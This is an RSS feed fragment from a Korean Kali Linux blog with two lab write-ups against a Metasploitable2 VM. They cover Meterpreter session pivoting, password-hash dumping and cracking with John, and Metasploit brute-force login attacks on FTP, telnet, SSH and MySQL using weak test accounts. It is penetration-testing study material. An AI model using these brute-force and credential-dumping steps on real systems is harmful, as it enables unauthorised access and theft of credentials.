&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;785&quot; data-origin-height=&quot;726&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dSFiEM/btrYAmdp4zy/Qa1RrqWAoQoNGHxZ1zrakk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dSFiEM/btrYAmdp4zy/Qa1RrqWAoQoNGHxZ1zrakk/img.png&quot; data-alt=&quot;session1 백그라운드로 옮기고 미터프리터를 실행하여 session1을 이용하여 session2 미터프리터 환경을 획득한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dSFiEM/btrYAmdp4zy/Qa1RrqWAoQoNGHxZ1zrakk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdSFiEM%2FbtrYAmdp4zy%2FQa1RrqWAoQoNGHxZ1zrakk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;785&quot; height=&quot;726&quot; data-origin-width=&quot;785&quot; data-origin-height=&quot;726&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;session1 백그라운드로 옮기고 미터프리터를 실행하여 session1을 이용하여 session2 미터프리터 환경을 획득한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;771&quot; data-origin-height=&quot;248&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wdMgG/btrYIcAuXTI/1G1QixA8VKLPBCSU7lLBqK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wdMgG/btrYIcAuXTI/1G1QixA8VKLPBCSU7lLBqK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wdMgG/btrYIcAuXTI/1G1QixA8VKLPBCSU7lLBqK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwdMgG%2FbtrYIcAuXTI%2F1G1QixA8VKLPBCSU7lLBqK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;771&quot; height=&quot;248&quot; data-origin-width=&quot;771&quot; data-origin-height=&quot;248&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;788&quot; data-origin-height=&quot;403&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ux08S/btrYzp29Nzt/8NiEgWz1kc5ydRD8CpES0k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ux08S/btrYzp29Nzt/8NiEgWz1kc5ydRD8CpES0k/img.png&quot; data-alt=&quot;비밀번호를 파일로 저장해 준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ux08S/btrYzp29Nzt/8NiEgWz1kc5ydRD8CpES0k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fux08S%2FbtrYzp29Nzt%2F8NiEgWz1kc5ydRD8CpES0k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;788&quot; height=&quot;403&quot; data-origin-width=&quot;788&quot; data-origin-height=&quot;403&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;비밀번호를 파일로 저장해 준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;498&quot; data-origin-height=&quot;26&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/vGk3d/btrYIwMrEpZ/CsXKFZt9JKO6JPphiyvMyK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/vGk3d/btrYIwMrEpZ/CsXKFZt9JKO6JPphiyvMyK/img.png&quot; data-alt=&quot;공격대상에서 사용한 유저의 명령어기록을 파일형태로 저장해 준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/vGk3d/btrYIwMrEpZ/CsXKFZt9JKO6JPphiyvMyK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FvGk3d%2FbtrYIwMrEpZ%2FCsXKFZt9JKO6JPphiyvMyK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;498&quot; height=&quot;26&quot; data-origin-width=&quot;498&quot; data-origin-height=&quot;26&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격대상에서 사용한 유저의 명령어기록을 파일형태로 저장해 준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mNgVu/btrYChv7u32/KJTvpIAausyniM69YGzUpk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mNgVu/btrYChv7u32/KJTvpIAausyniM69YGzUpk/img.png&quot; data-origin-width=&quot;586&quot; data-origin-height=&quot;300&quot; data-is-animation=&quot;false&quot; style=&quot;width: 47.244%; margin-right: 10px;&quot; data-widthpercent=&quot;47.8&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mNgVu/btrYChv7u32/KJTvpIAausyniM69YGzUpk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmNgVu%2FbtrYChv7u32%2FKJTvpIAausyniM69YGzUpk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;586&quot; height=&quot;300&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/burJTZ/btrYEjf6o5W/fhJ3bbGgTKmdiQmyqpXJj1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/burJTZ/btrYEjf6o5W/fhJ3bbGgTKmdiQmyqpXJj1/img.png&quot; data-origin-width=&quot;785&quot; data-origin-height=&quot;368&quot; data-is-animation=&quot;false&quot; style=&quot;width: 51.5932%;&quot; data-widthpercent=&quot;52.2&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/burJTZ/btrYEjf6o5W/fhJ3bbGgTKmdiQmyqpXJj1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FburJTZ%2FbtrYEjf6o5W%2FfhJ3bbGgTKmdiQmyqpXJj1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;785&quot; height=&quot;368&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;.msf4/loot 디렉토리에 저장된다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bD8hGV/btrYH10nrhf/0NcMITRKxE7bdcbfed0ZfK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bD8hGV/btrYH10nrhf/0NcMITRKxE7bdcbfed0ZfK/img.png&quot; data-origin-width=&quot;783&quot; data-origin-height=&quot;623&quot; data-is-animation=&quot;false&quot; style=&quot;width: 34.0927%; margin-right: 10px;&quot; data-widthpercent=&quot;34.49&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bD8hGV/btrYH10nrhf/0NcMITRKxE7bdcbfed0ZfK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbD8hGV%2FbtrYH10nrhf%2F0NcMITRKxE7bdcbfed0ZfK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;783&quot; height=&quot;623&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/betGVC/btrYzK0lj6a/67irMAqCqLVyBwwhckLYsk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/betGVC/btrYzK0lj6a/67irMAqCqLVyBwwhckLYsk/img.png&quot; data-origin-width=&quot;759&quot; data-origin-height=&quot;318&quot; data-is-animation=&quot;false&quot; style=&quot;width: 64.7445%;&quot; data-widthpercent=&quot;65.51&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/betGVC/btrYzK0lj6a/67irMAqCqLVyBwwhckLYsk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbetGVC%2FbtrYzK0lj6a%2F67irMAqCqLVyBwwhckLYsk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;759&quot; height=&quot;318&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;john 명령어를 이용하여 해쉬값을 풀어서 보여준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/70</guid>
      <comments>https://it-mandarine.tistory.com/70#entry70comment</comments>
      <pubDate>Thu, 9 Feb 2023 10:57:28 +0900</pubDate>
    </item>
    <item>
      <title>msfconsole - brute Force attack</title>
      <link>https://it-mandarine.tistory.com/69</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;대상 PC - Metasploitable2 : 192.168.0.23&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격 PC - Kail Linux 2022.4 : 192.168.0.29&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;모의 해킹 공격을 하기 전 공격 대상 PC에서 sudo 명령어를 사용할 수 있는 계정과 그룹을 확인한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;admin 그룹과 이름이 루트인 계정은 sudo 사용 가능.PNG&quot; data-origin-width=&quot;519&quot; data-origin-height=&quot;109&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/8Sx3h/btrYzKSALDJ/zLZ45TusCJF4dkIjBCZJWk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/8Sx3h/btrYzKSALDJ/zLZ45TusCJF4dkIjBCZJWk/img.png&quot; data-alt=&quot;admin 그룹과 이름이 루트인 계정은 sudo 사용 가능&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/8Sx3h/btrYzKSALDJ/zLZ45TusCJF4dkIjBCZJWk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F8Sx3h%2FbtrYzKSALDJ%2FzLZ45TusCJF4dkIjBCZJWk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;519&quot; height=&quot;109&quot; data-filename=&quot;admin 그룹과 이름이 루트인 계정은 sudo 사용 가능.PNG&quot; data-origin-width=&quot;519&quot; data-origin-height=&quot;109&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;admin 그룹과 이름이 루트인 계정은 sudo 사용 가능&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;대상 PC에서&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;admin1&amp;nbsp;/&amp;nbsp;1234&amp;nbsp;(sudo) &lt;br /&gt;&amp;nbsp;user2&amp;nbsp;&amp;nbsp;/&amp;nbsp;2222 &lt;br /&gt;&amp;nbsp;sales3 / 4545 계정을 생성한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;admin1계정을 admin그룹으로 가입시켜줌.PNG&quot; data-origin-width=&quot;431&quot; data-origin-height=&quot;124&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zjCkG/btrYzFw3wc8/PB6zl1w13mn7XBfpnb2uG1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zjCkG/btrYzFw3wc8/PB6zl1w13mn7XBfpnb2uG1/img.png&quot; data-alt=&quot;admin1계정을 admin그룹으로 지정해준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zjCkG/btrYzFw3wc8/PB6zl1w13mn7XBfpnb2uG1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzjCkG%2FbtrYzFw3wc8%2FPB6zl1w13mn7XBfpnb2uG1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;431&quot; height=&quot;124&quot; data-filename=&quot;admin1계정을 admin그룹으로 가입시켜줌.PNG&quot; data-origin-width=&quot;431&quot; data-origin-height=&quot;124&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;admin1계정을 admin그룹으로 지정해준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;metasploitable의 경우 user를 새로 생성하게 되면 홈 디렉토리가 생성이 되지 않는 문제가 생겼다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;cp-r 명령어로 skel디렉토리 복사 소유주 변경.PNG&quot; data-origin-width=&quot;574&quot; data-origin-height=&quot;308&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/HITtd/btrYz0VhZeN/JaOewaOjGTgURylJpov7WK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/HITtd/btrYz0VhZeN/JaOewaOjGTgURylJpov7WK/img.png&quot; data-alt=&quot;홈 디렉토리의 안에 필요한 파일이 들어있는 skel을 복사하여 admin1의 소유로 바꿔준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/HITtd/btrYz0VhZeN/JaOewaOjGTgURylJpov7WK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHITtd%2FbtrYz0VhZeN%2FJaOewaOjGTgURylJpov7WK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;574&quot; height=&quot;308&quot; data-filename=&quot;cp-r 명령어로 skel디렉토리 복사 소유주 변경.PNG&quot; data-origin-width=&quot;574&quot; data-origin-height=&quot;308&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;홈 디렉토리의 안에 필요한 파일이 들어있는 skel을 복사하여 admin1의 소유로 바꿔준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;브루트포스 공격을 하기 위하여&amp;nbsp; 칼리리눅스에 공격 대상 linux에서 생성한 유저 명과 패스워드를 넣은 텍스트 파일을 칼리리눅스에 생성한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Mysql 계정도 설정해준다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;DataBase &lt;br /&gt;&amp;nbsp;root@%&amp;nbsp;/&amp;nbsp;1234 &lt;br /&gt;&amp;nbsp;user5@%&amp;nbsp;/&amp;nbsp;6789 &lt;br /&gt;create&amp;nbsp;user&amp;nbsp;'user5'@'%'&amp;nbsp;identified&amp;nbsp;by&amp;nbsp;'6789'; &lt;br /&gt;&amp;nbsp;update&amp;nbsp;user&amp;nbsp;set&amp;nbsp;password&amp;nbsp;=&amp;nbsp;password('1234')&amp;nbsp;where&amp;nbsp;user&amp;nbsp;=&amp;nbsp;'root';&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;공격을 위한 아이디와 패스워드를 만들어준다.PNG&quot; data-origin-width=&quot;293&quot; data-origin-height=&quot;371&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bovIQf/btrYBXcr7Le/qaPlpAQC7Jnl8kbIw7xkpK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bovIQf/btrYBXcr7Le/qaPlpAQC7Jnl8kbIw7xkpK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bovIQf/btrYBXcr7Le/qaPlpAQC7Jnl8kbIw7xkpK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbovIQf%2FbtrYBXcr7Le%2FqaPlpAQC7Jnl8kbIw7xkpK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;293&quot; height=&quot;371&quot; data-filename=&quot;공격을 위한 아이디와 패스워드를 만들어준다.PNG&quot; data-origin-width=&quot;293&quot; data-origin-height=&quot;371&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격을 시도하기 위해 msfconsole을 실행한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;nmap 스캔.PNG&quot; data-origin-width=&quot;902&quot; data-origin-height=&quot;574&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/sR4lY/btrYAapWxtw/qCkNmhMNBM7ktcir0rve3K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/sR4lY/btrYAapWxtw/qCkNmhMNBM7ktcir0rve3K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/sR4lY/btrYAapWxtw/qCkNmhMNBM7ktcir0rve3K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FsR4lY%2FbtrYAapWxtw%2FqCkNmhMNBM7ktcir0rve3K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;902&quot; height=&quot;574&quot; data-filename=&quot;nmap 스캔.PNG&quot; data-origin-width=&quot;902&quot; data-origin-height=&quot;574&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격하기 전 공격 대상의 리눅스의 포트를 스캔한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;ftp 브루트포스 공격.PNG&quot; data-origin-width=&quot;790&quot; data-origin-height=&quot;607&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/A8lDn/btrYzD630Bo/fTXDqi5Tz2RvbKfN1cKIPk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/A8lDn/btrYzD630Bo/fTXDqi5Tz2RvbKfN1cKIPk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/A8lDn/btrYzD630Bo/fTXDqi5Tz2RvbKfN1cKIPk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FA8lDn%2FbtrYzD630Bo%2FfTXDqi5Tz2RvbKfN1cKIPk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;790&quot; height=&quot;607&quot; data-filename=&quot;ftp 브루트포스 공격.PNG&quot; data-origin-width=&quot;790&quot; data-origin-height=&quot;607&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;use auxiliary/scanner/ftp/ftp_login 을 입력하고 공격 대상의 ip, ftp의 포트넘버, 무한대입 공격을 위한 유저명과 패스워드가 들어있는 텍스트파일을 지정하고 횟수를 256번, 공격이 성공해도 멈추지 않게 설정한후에 run으로 공격을 실행해주었다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ftp포트로 공격을 시도한 결과 admin1, user2, sales3의 계정로그인이 성공하였다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;텔넷 공격결과.PNG&quot; data-origin-width=&quot;905&quot; data-origin-height=&quot;521&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/BlAuP/btrYy9ZFMPL/K3DlkDqGhBobZn6pU2FQD0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/BlAuP/btrYy9ZFMPL/K3DlkDqGhBobZn6pU2FQD0/img.png&quot; data-alt=&quot;telnet 공격 시도&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/BlAuP/btrYy9ZFMPL/K3DlkDqGhBobZn6pU2FQD0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FBlAuP%2FbtrYy9ZFMPL%2FK3DlkDqGhBobZn6pU2FQD0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;905&quot; height=&quot;521&quot; data-filename=&quot;텔넷 공격결과.PNG&quot; data-origin-width=&quot;905&quot; data-origin-height=&quot;521&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;telnet 공격 시도&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;ssh 공격.PNG&quot; data-origin-width=&quot;901&quot; data-origin-height=&quot;513&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/oPWRN/btrYvnxqbqn/DhS1ODEotzyy9McClBX4t1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/oPWRN/btrYvnxqbqn/DhS1ODEotzyy9McClBX4t1/img.png&quot; data-alt=&quot;ssh 공격 시도&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/oPWRN/btrYvnxqbqn/DhS1ODEotzyy9McClBX4t1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FoPWRN%2FbtrYvnxqbqn%2FDhS1ODEotzyy9McClBX4t1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;901&quot; height=&quot;513&quot; data-filename=&quot;ssh 공격.PNG&quot; data-origin-width=&quot;901&quot; data-origin-height=&quot;513&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;ssh 공격 시도&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;mysql공굑.PNG&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;913&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/8Gvze/btrYyU2z3gs/U8PBEQE7ikOJ9KVtkyJpj0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/8Gvze/btrYyU2z3gs/U8PBEQE7ikOJ9KVtkyJpj0/img.png&quot; data-alt=&quot;mysql 공격 시도&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/8Gvze/btrYyU2z3gs/U8PBEQE7ikOJ9KVtkyJpj0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F8Gvze%2FbtrYyU2z3gs%2FU8PBEQE7ikOJ9KVtkyJpj0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;900&quot; height=&quot;913&quot; data-filename=&quot;mysql공굑.PNG&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;913&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;mysql 공격 시도&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;creds공격결과.PNG&quot; data-origin-width=&quot;857&quot; data-origin-height=&quot;342&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/8qiqc/btrYwopmecQ/bDTeUQkECgE146MgMpW0BK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/8qiqc/btrYwopmecQ/bDTeUQkECgE146MgMpW0BK/img.png&quot; data-alt=&quot;creds 명령어로 공격 결과를 확인할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/8qiqc/btrYwopmecQ/bDTeUQkECgE146MgMpW0BK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F8qiqc%2FbtrYwopmecQ%2FbDTeUQkECgE146MgMpW0BK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;857&quot; height=&quot;342&quot; data-filename=&quot;creds공격결과.PNG&quot; data-origin-width=&quot;857&quot; 